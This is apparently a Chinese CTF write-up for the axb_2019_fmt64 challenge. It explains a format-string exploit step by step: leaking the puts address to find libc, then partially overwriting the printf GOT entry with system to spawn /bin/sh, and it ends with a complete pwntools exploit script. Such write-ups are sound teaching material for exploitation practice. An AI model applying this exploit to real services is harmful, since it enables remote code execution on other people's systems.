axb_2019_fmt64(格式化单字节修改–\x00 截断)

1773827355247-c2e383eb-ce2a-4101-a6f2-173cb8b9b7dd.png

格式化字符串漏洞,第一步是测偏移:aaaa%x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x

1773827528956-6d286bb5-dad8-4a6e-a25a-02eb8e2dff33.png

发现偏移为 8,我们可以通过 puts 表泄露 libc 基地址

1
2
3
4
payload = p64(puts_got) + b"%8$s" 
p.sendafter("Please tell me:",payload)
puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print("[+][+][+][+] puts_address = ",hex(puts_addr))
1773832100946-e0bf694e-5caf-40c7-88c3-3765ec4d3cec.png

这里我们发现我们本来应该泄露的地址为%8$s,但由于小端排序,Sent 的内容被 printf 接收之后会被 00 截断

导致无法泄露 Rececive%8$s 的地址。那就想办法把格式化字符串放在 p64(puts_got)前面:

1
2
3
4
5
payload = b"%9$s" + b'AAAA' + p64(puts_got)
p.sendafter("Please tell me:",payload)
p.recvuntil("Repeater:")
puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print("[+][+][+][+] puts_address = ",hex(puts_addr))

由于%8$sAAAA 一共是 8 个字符,正好是一个内存单元,所以偏移需要加 1 编成%9$s,再看一下 DEBUG:

1773833202947-f6784e94-cb15-4d6e-8a5b-8445e1c4c54b.png

之后我们继续看,我们最终是想要把 printf 表修改成 system 表,从而执行 system(‘/bin/sh’);

1773833829386-030f2725-5823-4dcc-94c9-9318fe940cae.png

发现他们只有最低的五位是不一样的,我们就只需要改这些就可以了。

1
2
3
%xc$n   -> 对应的是一个int,四字节的修改
%xc$hn  -> 对应的是一个short int ,双字节的修改(half n)
%xc$hhn -> 对应一个char,单字节的修改
1
2
3
4
5
6
7
8
9
10
11
12
high_s = (system_addr >> 16) & 0xff  # 单字节修改
# 首先是把地址右移四位,然后只取最低字节,&运算高位直接清零

lows = system_addr & 0xffff         # 双字节修改
# 这个是直接把除了低2个字节,其他高位全部清零

payload0=(f'%{high_s-9}c%12$hhn'+f'%{lows - highs}c%13$hn').encode()
print(len(payload0))
payload=payload0.ljust(32, b"a") + p64(printf_got + 2) + p64(printf_got)
io.sendlineafter(b'Please tell me:',payload)
io.sendlineafter(b'Please tell me:',b';/bin/sh\x00')

看一下 payload0:

  1. 首先是%nc 表示输出 n 个字符,-9 表示除去前面 payload 的 9 个字符
  2. %12$hhn 表示修改到栈上的第 12 个参数,仅写一个字节
  3. c%13$hn 表示修改到栈上的第 13 个参数,修改两个字节
  4. .encode()把字符串转化为 bytes 类型数据
  5. 填充 32 个字节
  6. p64(printf_got + 2)说的是高 2 字节
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
from pwn import *
context(arch = 'amd64',os = 'linux',log_level='debug')
p = process("./fmt64")
# p = remote("node5.buuoj.cn",25552)
libc = ELF('./libc-2.23.so')
elf = ELF("./fmt64")
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
printf_got = elf.got['printf']
 
payload = b"%9$s" + b'AAAA' + p64(puts_got) # 注意偏移
p.sendafter("Please tell me:",payload)
p.recvuntil("Repeater:")
puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
# gdb.attach(p)

# libc = LibcSearcher('puts',puts_addr)
base = puts_addr - libc.sym['puts']
system_addr = base + libc.sym['system']
print("[+][+][+][+]   puts_address = ",hex(puts_addr))
print("[+][+][+][+] system_address = ",hex(system_addr))
 
high_s = (system_addr >> 16) & 0xff  # 单字节修改
# 首先是把地址右移四位,然后只取最低字节,&运算高位直接清零

lows = system_addr & 0xffff         # 双字节修改
# 这个是直接把除了低2个字节,其他高位全部清零

payload=(f'%{high_s-9}c%12$hhn'+f'%{lows - high_s}c%13$hn').encode()
print(len(payload))
payload=payload.ljust(32, b"a") + p64(printf_got + 2) + p64(printf_got)
p.sendafter("Please tell me:",payload)
p.sendline(b";/bin/sh\x00")

p.interactive()

更新: 2026-04-05 10:32:31
原文: https://www.yuque.com/idcm/wnemg9/ze7xrabkotpg7lvk